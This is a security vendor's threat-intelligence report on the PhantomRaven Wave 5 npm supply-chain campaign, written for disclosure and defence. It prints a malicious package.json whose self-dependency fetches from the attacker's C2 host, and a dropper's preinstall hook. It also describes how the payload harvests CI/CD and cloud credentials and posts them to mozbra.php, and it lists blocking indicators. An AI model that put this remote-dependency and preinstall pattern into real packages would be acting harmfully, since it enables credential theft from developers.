Lyrie
Streams
CVE Deep DivesActive ExploitationResearchBreachesLyrie OriginalsAI Threats
SearchMethodology
Get Lyrie →
Supply-Chain
0 sources verified·6 min read
By Lyrie Threat Intelligence·5/4/2026

PhantomRaven Wave 5: The Three-Stage npm Supply Chain That Trades Visibility for Secrets

TL;DR

Mend.io researchers uncovered PhantomRaven Wave 5—a previously undocumented fifth wave of an npm supply chain attack campaign that began in August 2025. The attacker has published 33 new malicious packages targeting DeFi developers, cloud infrastructure engineers, and AI developers, using a sophisticated three-stage Remote Dynamic Dependency (RDD) delivery mechanism that remains invisible during npm install and exfiltrates developer credentials via a Pakistan-hosted C2 infrastructure.

What Happened

The PhantomRaven campaign—attributed to a threat actor using variants of "Dharshan JP" as identifier—has been poisoning the npm ecosystem for nine months. While EndorLabs publicly disclosed the first four waves (October 2025 through March 2026), the actor never stopped. Just eight days after the public disclosure of Wave 4, they registered a new C2 domain and resumed publishing.

Wave 5 specifics:

  • 33 new malicious packages published as recently as April 26, 2026
  • New C2 infrastructure: pack[.]nppacks[.]com registered March 10, 2026
  • Three-stage attack chain: Invisible to users, token-gated, single-use credential system
  • Active as of discovery: All 33 packages remain live on npm; C2 infrastructure still operational
  • Target communities: DeFi ($10B+ in locked assets), cloud infrastructure (AWS/Azure credentials), and AI/LLM developers

Unlike previous waves, this iteration uses a more sophisticated delivery mechanism that bypasses static analysis tools, evades forensic detection, and targets developer communities most likely to have high-value credentials and production access.

Technical Details

The Three-Stage Attack Chain

Stage 0: The Lure

Each malicious package appears legitimate—reasonable name, mature version number, empty index.js. The trap is hidden in package.json: the package lists itself as its own dependency, but points to the attacker's server instead of npm.

{
  "name": "graphql-js-client-transform",
  "version": "6.14.0",
  "dependencies": {
    "graphql-js-client-transform": "http://pack[.]nppacks[.]com/npm/graphql-js-client-transform"
  }
}

When npm install runs, npm resolves this self-referencing dependency and fetches from the attacker's server. This technique—Remote Dynamic Dependency (RDD)—bypasses static analysis because the malicious code lives on the C2, not in the published package.

Stage 1: The Redirect Layer

The C2 returns a unique tarball per package (different SHA256), but every tarball contains identical index.js code that redirects to the same universal Stage 2 dropper: idle-style-xi. Hash-based detection sees a unique file with no prior record. But the real work happens elsewhere.

Stage 2: The Execution Layer (idle-style-xi)

This package is never published to npm—only served from the C2. Its preinstall lifecycle hook executes automatically before npm install completes, requiring no user interaction:

{
  "name": "idle-style-xi",
  "version": "2.0.1",
  "scripts": {
    "preinstall": "node index.js"
  }
}

The preinstall script:

1. Fingerprints the victim: collects system info, CI/CD environment variables, public IP

2. Authenticates with C2: requests a token from token.php (includes X-Package-Name header check—rejects any value except idle-style-xi)

3. Downloads personalized payload: single-use token that expires in seconds

4. Executes silently: all console output suppressed; temporary file executed and deleted

5. Exfiltrates data: POSTs full system profile to mozbra.php

Stage 3: The Silent Harvester

The final 5,865-byte JavaScript payload:

  • Suppresses all console.log/error/warn output (developer sees nothing)
  • Harvests email from: environment variables, ~/.gitconfig, ~/.npmrc, package.json
  • Collects CI/CD context: GitHub Actions, GitLab CI, Jenkins, CircleCI environment variables
  • Resolves public IP via api64.ipify.org
  • POSTs everything as JSON to attacker-controlled mozbra.php

Example exfiltrated data includes: developer email, GitHub repository names, CI/CD actor tokens, hostname, OS type, Node version—everything needed to compromise downstream systems.

Attack Surface by Target Community

DeFi Developers (new in Wave 5)

  • eigenlayer-sdk, @inverse-finance/vesting-contracts
  • Targets developers with access to private keys and wallet files
  • Total ecosystem value: $10B+ in locked assets across platforms

Cloud Infrastructure Engineers

  • @cdktf-constructs/azure-* packages impersonating Terraform Azure CDK
  • Developers likely to have AWS and Azure credentials in environment
  • Routine access to service principals and cross-tenant identities

AI/LLM Developers (new in Wave 5)

  • @promptions/promptions-* packages
  • Growing target community with access to API keys, model credentials, and training data
  • Potential lateral movement into enterprise AI infrastructure

JavaScript/React Developers

  • Babel plugin impersonations (transform-es2015-*, react-schedule-it, react-remove-properties)
  • Largest installed base; local-rules alone had 511 downloads
  • Mass credential harvesting across development environments

Infrastructure Clues

The C2 domain pack[.]nppacks[.]com resolves to 54.160.138.70 (AWS EC2 us-east-1). A reverse IP lookup reveals a second virtual host: hblnew[.]ecompk[.]com.

This is the critical finding: ecompk.com is a legitimate Karachi-based IT services firm. Their HBL (Habib Bank Limited—Pakistan's largest bank) hosts an e-commerce platform on hblnew[.]ecompk[.]com. Both domains resolve to the same Apache server, both serve identical malicious tarballs.

This indicates either:

  • Compromised ECOM PK Cloudflare credentials (likely)
  • Insider access at ECOM PK (possible)
  • Supply chain compromise upstream of ECOM PK (unlikely but not ruled out)

The attacker has DNS-level control of a legitimate firm's subdomain.

Lyrie Assessment

PhantomRaven Wave 5 represents the supply chain attack pattern Lyrie's customers need to understand: the goal is not to break your systems, but to live inside your developers' machines invisibly.

Why This Matters to Enterprise Defense

1. Invisibility by design: Three-stage RDD delivery + preinstall hooks = zero user-visible artifacts. Your developers won't see errors or warnings.

2. Targeting high-value credential containers: DeFi wallets, cloud credentials, CI/CD tokens. The attacker knows exactly who has the most valuable secrets.

3. Token-gated evasion: The C2 validates X-Package-Name header and blocks non-matching requests. Security researchers probing the infrastructure get 403. This slows detection and research.

4. Credential exfiltration before detection: Data is POST'd to mozbra.php within seconds of installation. By the time npm audit picks up the package, the credentials are already stolen.

5. Self-replicating worm potential: Previous Shai-Hulud campaigns (related threat actor) added self-propagation. Wave 5 hasn't shown this yet, but infrastructure suggests capability.

The Real Risk: Downstream Compromise

An npm install in a developer's CI/CD environment during Wave 5 compromise means:

  • GITHUB_ACTOR, GITHUB_REPOSITORY variables exfiltrated
  • GitHub token accessible if set in workflow
  • AWS/Azure credentials from ~/.aws/credentials, ~/.azure
  • Any API key stored as environment variable
  • Kubernetes service account tokens if running in-cluster

From there: repository compromise, secrets pipeline corruption, internal tooling poisoning, lateral movement into production infrastructure.

Detection Gaps

Standard defenses fail against PhantomRaven Wave 5:

  • npm audit: Can't see packages that live only on the C2
  • Dependency lock file analysis: Package-lock.json records the Stage 1 package, not the Stage 2 dropper
  • Static analysis: No malicious code in the npm registry itself
  • Antivirus: Fileless execution + temp file deletion = missed by traditional endpoint scanning
  • Network detection: HTTPS exfiltration to api64.ipify.org looks like normal system call; POST to mozbra.php is single HTTP request in noisy CI/CD logs

Recommended Actions

Immediate (if Wave 5 packages installed):

1. Treat as complete compromise: Any system that installed any of the 33 packages should be treated as fully compromised.

2. Rotate all credentials: npm tokens, SSH keys, AWS/Azure/GCP credentials, GitHub tokens, Kubernetes service accounts.

3. Audit CI/CD workflows: Search logs for X-Package-Name, mozbra.php, token.php requests.

4. Review secrets access: Check what credentials were available in the environment where installation occurred.

Short-term (next 48 hours):

1. Block C2 infrastructure at DNS/network perimeter:

- pack[.]nppacks[.]com

- hblnew[.]ecompk[.]com

- 54[.]160[.]138[.]70

- Outbound POST to pack[.]nppacks[.]com/mozbra.php (active exfiltration indicator)

2. Scan dependency trees:

   grep -r "http://" package.json package-lock.json | grep -v "registry.npmjs.org"

Any HTTP-based dependency pointing outside npm registry is critical.

3. Audit npm package publishing permissions: Review .npmrc files for shared tokens; rotate scoped package publishing credentials.

Medium-term (1-2 weeks):

1. Enforce --ignore-scripts: Block npm preinstall/postinstall/prepare hooks where build scripts aren't required.

2. Implement CI/CD secret rotation policy: Assume CI/CD tokens are exfiltrated; rotate monthly (not annually).

3. Monitor for Pattern Reuse: Watch for similar RDD patterns in other package managers (PyPI, Cargo, Go modules). This pattern will spread.

Programmatic Defense:

  • npm supply chain monitoring: Tools like Snyk, Socket.dev, or WhiteSource scan for known-malicious packages + suspicious behaviors.
  • MCP (Model Context Protocol) scanning: If using AI coding assistants, audit their package dependencies for supply chain vulnerabilities.
  • Zero-trust npm registry access: Require explicit approval for package installation in critical CI/CD pipelines.

Sources

1. https://www.mend.io/blog/phantomraven-wave-5-new-undocumented-npm-supply-chain-campaign-targets-defi-cloud-and-ai-developers/

2. https://gbhackers.com/attackers-hijack-sap-npm/ (Mini Shai-Hulud context, related actor)

3. https://www.endorlabs.com/learn/return-of-phantomraven (Wave 1-4 disclosure)

Lyrie.ai Cyber Research Division

Lyrie Verdict

Lyrie's autonomous defense layer flags this class of exposure the moment it surfaces — no signature update required.

Related Articles

originals
Shai-Hulud Devours the Ecosystem: TeamPCP's Cross-Ecosystem Supply Chain Blitz Hits PyTorch Lightning, SAP npm, Bitwarden, and Hundreds of CI/CD Pipelines
8 min read · 0 sources
originals
CISA Copy Fail Escalation: Federal Mandate + Container Crisis + 72-Hour Exploitation Window
4 min read · 0 sources